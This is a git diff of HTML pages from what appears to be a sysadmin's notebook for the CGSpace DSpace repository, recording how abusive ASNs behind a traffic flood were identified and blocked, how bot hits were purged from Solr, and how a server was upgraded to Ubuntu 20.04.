                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +$ wc -l /tmp/all-ips-to-block.txt 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +5095 /tmp/all-ips-to-block.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Then I added them to the normal ipset we are already using with firewalld
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • I will check again in a few hours and ban more
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • @@ -571,10 +571,10 @@ $ wc -l /tmp/all-ips-to-block.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • I decided to extract the networks from the GeoIP database with resolve-addresses-geoip2.py so I can block them more efficiently than using the 5,000 IPs in an ipset:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          $ csvgrep -c asn -r '^(206485|35624|36352|46844|49453|62282)$' /tmp/all-ips-out.csv | csvcut -c network | sed 1d | sort | uniq > /tmp/all-networks-to-block.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -$ grep deny roles/dspace/templates/nginx/abusive-networks.conf.j2 | sort | uniq | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -2354
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            $ csvgrep -c asn -r '^(206485|35624|36352|46844|49453|62282)$' /tmp/all-ips-out.csv | csvcut -c network | sed 1d | sort | uniq > /tmp/all-networks-to-block.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +$ grep deny roles/dspace/templates/nginx/abusive-networks.conf.j2 | sort | uniq | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +2354
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Combined with the previous networks this brings about 200 more for a total of 2,354 networks
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • I think I need to re-work the ipset stuff in my common Ansible role so that I can add such abusive networks as an iptables ipset / nftables set, and have a cron job to update them daily (from Spamhaus’s DROP and EDROP lists, for example)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • @@ -582,51 +582,51 @@ $ grep deny roles/dspace/templates/nginx/abusive-networks.conf.j2 | sort | uniq
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Then I got a list of all the 5,095 IPs from above and used check-spider-ip-hits.sh to purge them from Solr:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              $ ilri/check-spider-ip-hits.sh -f /tmp/all-ips-to-block.txt -p
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -...
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -Total number of bot hits purged: 197116
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $ ilri/check-spider-ip-hits.sh -f /tmp/all-ips-to-block.txt -p
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +...
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +Total number of bot hits purged: 197116
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • I started a harvest on AReS and it finished in a few hours now that the load on CGSpace is back to a normal level

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2021-07-20

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Looking again at the IPs making connections to CGSpace over the last few days from these seven ASNs, it’s much higher than I noticed yesterday:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $ csvgrep -c asn -r '^(49453|46844|206485|62282|36352|35913|35624)$' /tmp/out.csv | csvcut -c ip | sed 1d | sort | uniq | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -5643
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  $ csvgrep -c asn -r '^(49453|46844|206485|62282|36352|35913|35624)$' /tmp/out.csv | csvcut -c ip | sed 1d | sort | uniq | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +5643
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • I purged 27,000 more hits from the Solr stats using this new list of IPs with my check-spider-ip-hits.sh script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Surprise surprise, I checked the nginx logs from 2021-06-23 when we last had issues with thousands of XMLUI sessions and PostgreSQL connections and I see IPs from the same ASNs!
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  $ sudo zcat --force /var/log/nginx/access.log.27.gz /var/log/nginx/access.log.28.gz | grep -E " (200|499) " | grep -v -E "(mahider|Googlebot|Turnitin|Grammarly|Unpaywall|UptimeRobot|bot)" | awk '{print $1}' | sort | uniq > /tmp/all-ips-june-23.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -$ ./ilri/resolve-addresses-geoip2.py -i /tmp/all-ips-june-23.txt -o /tmp/out.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -$ csvcut -c 2,4 /tmp/out.csv | sed 1d | sort | uniq -c | sort -n | tail -n 15
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -    265 GOOGLE,15169
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -    277 Silverstar Invest Limited,35624
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -    280 FACEBOOK,32934
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -    288 SAFARICOM-LIMITED,33771
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -    399 AMAZON-AES,14618
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -    427 MICROSOFT-CORP-MSN-AS-BLOCK,8075
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -    455 Opera Software AS,39832
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -    481 MTN NIGERIA Communication limited,29465
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -    502 DEDIPATH-LLC,35913
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -    506 AS-COLOCROSSING,36352
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -    602 UAB Rakrejus,62282
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -    822 ST-BGP,46844
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -    874 Ethiopian Telecommunication Corporation,24757
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -    912 UGB Hosting OU,206485
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -   1607 Global Layer B.V.,49453
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $ sudo zcat --force /var/log/nginx/access.log.27.gz /var/log/nginx/access.log.28.gz | grep -E " (200|499) " | grep -v -E "(mahider|Googlebot|Turnitin|Grammarly|Unpaywall|UptimeRobot|bot)" | awk '{print $1}' | sort | uniq > /tmp/all-ips-june-23.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +$ ./ilri/resolve-addresses-geoip2.py -i /tmp/all-ips-june-23.txt -o /tmp/out.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +$ csvcut -c 2,4 /tmp/out.csv | sed 1d | sort | uniq -c | sort -n | tail -n 15
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +    265 GOOGLE,15169
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +    277 Silverstar Invest Limited,35624
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +    280 FACEBOOK,32934
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +    288 SAFARICOM-LIMITED,33771
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +    399 AMAZON-AES,14618
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +    427 MICROSOFT-CORP-MSN-AS-BLOCK,8075
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +    455 Opera Software AS,39832
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +    481 MTN NIGERIA Communication limited,29465
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +    502 DEDIPATH-LLC,35913
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +    506 AS-COLOCROSSING,36352
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +    602 UAB Rakrejus,62282
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +    822 ST-BGP,46844
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +    874 Ethiopian Telecommunication Corporation,24757
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +    912 UGB Hosting OU,206485
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +   1607 Global Layer B.V.,49453
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Again it was over 5,000 IPs:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $ csvgrep -c asn -r '^(49453|46844|206485|62282|36352|35913|35624)$' /tmp/out.csv | csvcut -c ip | sed 1d | sort | uniq | wc -l         
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -5228
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      $ csvgrep -c asn -r '^(49453|46844|206485|62282|36352|35913|35624)$' /tmp/out.csv | csvcut -c ip | sed 1d | sort | uniq | wc -l         
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +5228
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Interestingly, it seems these are five thousand different IP addresses than the attack from last weekend, as there are over 10,000 unique ones if I combine them!
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      $ cat /tmp/ips-june23.txt /tmp/ips-jul16.txt | sort | uniq | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -10458
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        $ cat /tmp/ips-june23.txt /tmp/ips-jul16.txt | sort | uniq | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +10458
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • I purged all the (26,000) hits from these new IP addresses from Solr as well
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Looking back at my notes for the 2019-05 attack I see that I had already identified most of these network providers (!)…
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            @@ -636,30 +636,30 @@ $ csvcut -c 2,4 /tmp/out.csv | sed 1d | sort | uniq -c | sort -n | tail -n
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Adding QuadraNet brings the total networks seen during these two attacks to 262, and the number of unique IPs to 10900:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          # zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2 /var/log/nginx/access.log.3 /var/log/nginx/access.log.4 /var/log/nginx/access.log.5 /var/log/nginx/access.log.27.gz /var/log/nginx/access.log.28.gz | grep -E " (200|499) " | grep -v -E "(mahider|Googlebot|Turnitin|Grammarly|Unpaywall|UptimeRobot|bot)" | awk '{print $1}' | sort | uniq > /tmp/ddos-ips.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -# wc -l /tmp/ddos-ips.txt 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -54002 /tmp/ddos-ips.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -$ ./ilri/resolve-addresses-geoip2.py -i /tmp/ddos-ips.txt -o /tmp/ddos-ips.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -$ csvgrep -c asn -r '^(49453|46844|206485|62282|36352|35913|35624|8100)$' /tmp/ddos-ips.csv | csvcut -c ip | sed 1d | sort | uniq > /tmp/ddos-ips-to-purge.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -$ wc -l /tmp/ddos-ips-to-purge.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -10900 /tmp/ddos-ips-to-purge.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -$ csvgrep -c asn -r '^(49453|46844|206485|62282|36352|35913|35624|8100)$' /tmp/ddos-ips.csv | csvcut -c network | sed 1d | sort | uniq > /tmp/ddos-networks-to-block.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -$ wc -l /tmp/ddos-networks-to-block.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -262 /tmp/ddos-networks-to-block.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            # zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2 /var/log/nginx/access.log.3 /var/log/nginx/access.log.4 /var/log/nginx/access.log.5 /var/log/nginx/access.log.27.gz /var/log/nginx/access.log.28.gz | grep -E " (200|499) " | grep -v -E "(mahider|Googlebot|Turnitin|Grammarly|Unpaywall|UptimeRobot|bot)" | awk '{print $1}' | sort | uniq > /tmp/ddos-ips.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +# wc -l /tmp/ddos-ips.txt 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +54002 /tmp/ddos-ips.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +$ ./ilri/resolve-addresses-geoip2.py -i /tmp/ddos-ips.txt -o /tmp/ddos-ips.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +$ csvgrep -c asn -r '^(49453|46844|206485|62282|36352|35913|35624|8100)$' /tmp/ddos-ips.csv | csvcut -c ip | sed 1d | sort | uniq > /tmp/ddos-ips-to-purge.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +$ wc -l /tmp/ddos-ips-to-purge.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +10900 /tmp/ddos-ips-to-purge.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +$ csvgrep -c asn -r '^(49453|46844|206485|62282|36352|35913|35624|8100)$' /tmp/ddos-ips.csv | csvcut -c network | sed 1d | sort | uniq > /tmp/ddos-networks-to-block.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +$ wc -l /tmp/ddos-networks-to-block.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +262 /tmp/ddos-networks-to-block.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • The new total number of networks to block, including the network prefixes for these ASNs downloaded from asn.ipinfo.app, is 4,007:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            $ wget https://asn.ipinfo.app/api/text/nginx/AS49453 \
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -https://asn.ipinfo.app/api/text/nginx/AS46844 \
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -https://asn.ipinfo.app/api/text/nginx/AS206485 \
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -https://asn.ipinfo.app/api/text/nginx/AS62282 \
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -https://asn.ipinfo.app/api/text/nginx/AS36352 \
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -https://asn.ipinfo.app/api/text/nginx/AS35913 \
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -https://asn.ipinfo.app/api/text/nginx/AS35624 \
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -https://asn.ipinfo.app/api/text/nginx/AS8100
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -$ cat AS* /tmp/ddos-networks-to-block.txt | sed -e '/^$/d' -e '/^#/d' -e '/^{/d' -e 's/deny //' -e 's/;//' | sort | uniq | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -4007
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              $ wget https://asn.ipinfo.app/api/text/nginx/AS49453 \
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +https://asn.ipinfo.app/api/text/nginx/AS46844 \
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +https://asn.ipinfo.app/api/text/nginx/AS206485 \
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +https://asn.ipinfo.app/api/text/nginx/AS62282 \
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +https://asn.ipinfo.app/api/text/nginx/AS36352 \
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +https://asn.ipinfo.app/api/text/nginx/AS35913 \
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +https://asn.ipinfo.app/api/text/nginx/AS35624 \
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +https://asn.ipinfo.app/api/text/nginx/AS8100
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +$ cat AS* /tmp/ddos-networks-to-block.txt | sed -e '/^$/d' -e '/^#/d' -e '/^{/d' -e 's/deny //' -e 's/;//' | sort | uniq | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +4007
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • I re-applied these networks to nginx on CGSpace (linode18) and DSpace Test (linode26), and purged 14,000 more Solr statistics hits from these IPs

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2021-07-22

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              diff --git a/docs/2021-08/index.html b/docs/2021-08/index.html index a2c8486cb..6d29f912e 100644 --- a/docs/2021-08/index.html +++ b/docs/2021-08/index.html @@ -32,7 +32,7 @@ Update Docker images on AReS server (linode20) and reboot the server: I decided to upgrade linode20 from Ubuntu 18.04 to 20.04 "/> - + @@ -122,37 +122,37 @@ I decided to upgrade linode20 from Ubuntu 18.04 to 20.04
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Update Docker images on AReS server (linode20) and reboot the server:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              # docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                # docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • I decided to upgrade linode20 from Ubuntu 18.04 to 20.04
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • First running all existing updates, taking some backups, checking for broken packages, and then rebooting:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                # apt update && apt dist-upgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -# apt autoremove && apt autoclean
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -# check for any packages with residual configs we can purge
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -# dpkg -l | grep -E '^rc' | awk '{print $2}'
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -# dpkg -l | grep -E '^rc' | awk '{print $2}' | xargs dpkg -P
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -# dpkg -C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -# dpkg -l > 2021-08-01-linode20-dpkg.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -# tar -I zstd -cvf 2021-08-01-etc.tar.zst /etc
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -# reboot
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -# sed -i 's/bionic/focal/' /etc/apt/sources.list.d/*.list
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -# do-release-upgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  # apt update && apt dist-upgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +# apt autoremove && apt autoclean
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +# check for any packages with residual configs we can purge
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +# dpkg -l | grep -E '^rc' | awk '{print $2}'
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +# dpkg -l | grep -E '^rc' | awk '{print $2}' | xargs dpkg -P
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +# dpkg -C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +# dpkg -l > 2021-08-01-linode20-dpkg.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +# tar -I zstd -cvf 2021-08-01-etc.tar.zst /etc
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +# reboot
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +# sed -i 's/bionic/focal/' /etc/apt/sources.list.d/*.list
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +# do-release-upgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • … but of course it hit the libxcrypt bug
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • I had to get a copy of libcrypt.so.1.1.0 from a working Ubuntu 20.04 system and finish the upgrade manually
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  # apt install -f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -# apt dist-upgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -# reboot
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    # apt install -f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +# apt dist-upgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +# reboot
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • After rebooting I purged all packages with residual configs and cleaned up again:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    # dpkg -l | grep -E '^rc' | awk '{print $2}' | xargs dpkg -P
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -# apt autoremove && apt autoclean
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    # zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2 /var/log/nginx/access.log.3 /var/log/nginx/access.log.4 /var/log/nginx/access.log.5 /var/log/nginx/access.log.6 /var/log/nginx/access.log.7 /var/log/nginx/access.log.8 | grep -E " (200|499) " | grep -v -E "(mahider|Googlebot|Turnitin|Grammarly|Unpaywall|UptimeRobot|bot)" | awk '{print $1}' | sort | uniq > /tmp/2021-08-05-all-ips.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -# wc -l /tmp/2021-08-05-all-ips.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -43428 /tmp/2021-08-05-all-ips.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      # zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2 /var/log/nginx/access.log.3 /var/log/nginx/access.log.4 /var/log/nginx/access.log.5 /var/log/nginx/access.log.6 /var/log/nginx/access.log.7 /var/log/nginx/access.log.8 | grep -E " (200|499) " | grep -v -E "(mahider|Googlebot|Turnitin|Grammarly|Unpaywall|UptimeRobot|bot)" | awk '{print $1}' | sort | uniq > /tmp/2021-08-05-all-ips.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +# wc -l /tmp/2021-08-05-all-ips.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +43428 /tmp/2021-08-05-all-ips.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Already I can see that the total is much less than during the attack on one weekend last month (over 50,000!)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Indeed, now I see that there are no IPs from those networks coming in now:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      $ ./ilri/resolve-addresses-geoip2.py -i /tmp/2021-08-05-all-ips.txt -o /tmp/2021-08-05-all-ips.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -$ csvgrep -c asn -r '^(49453|46844|206485|62282|36352|35913|35624|8100)$' /tmp/2021-08-05-all-ips.csv | csvcut -c ip | sed 1d | sort | uniq > /tmp/2021-08-05-all-ips-to-purge.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -$ wc -l /tmp/2021-08-05-all-ips-to-purge.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -0 /tmp/2021-08-05-all-ips-to-purge.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2021-08-08

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      $ ./ilri/resolve-addresses-geoip2.py -i /tmp/2021-08-05-all-ips.txt -o /tmp/2021-08-05-all-ips.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +$ csvgrep -c asn -r '^(49453|46844|206485|62282|36352|35913|35624|8100)$' /tmp/2021-08-05-all-ips.csv | csvcut -c ip | sed 1d | sort | uniq > /tmp/2021-08-05-all-ips-to-purge.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +$ wc -l /tmp/2021-08-05-all-ips-to-purge.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +0 /tmp/2021-08-05-all-ips-to-purge.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2021-08-08

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Advise IWMI colleagues on best practices for thumbnails
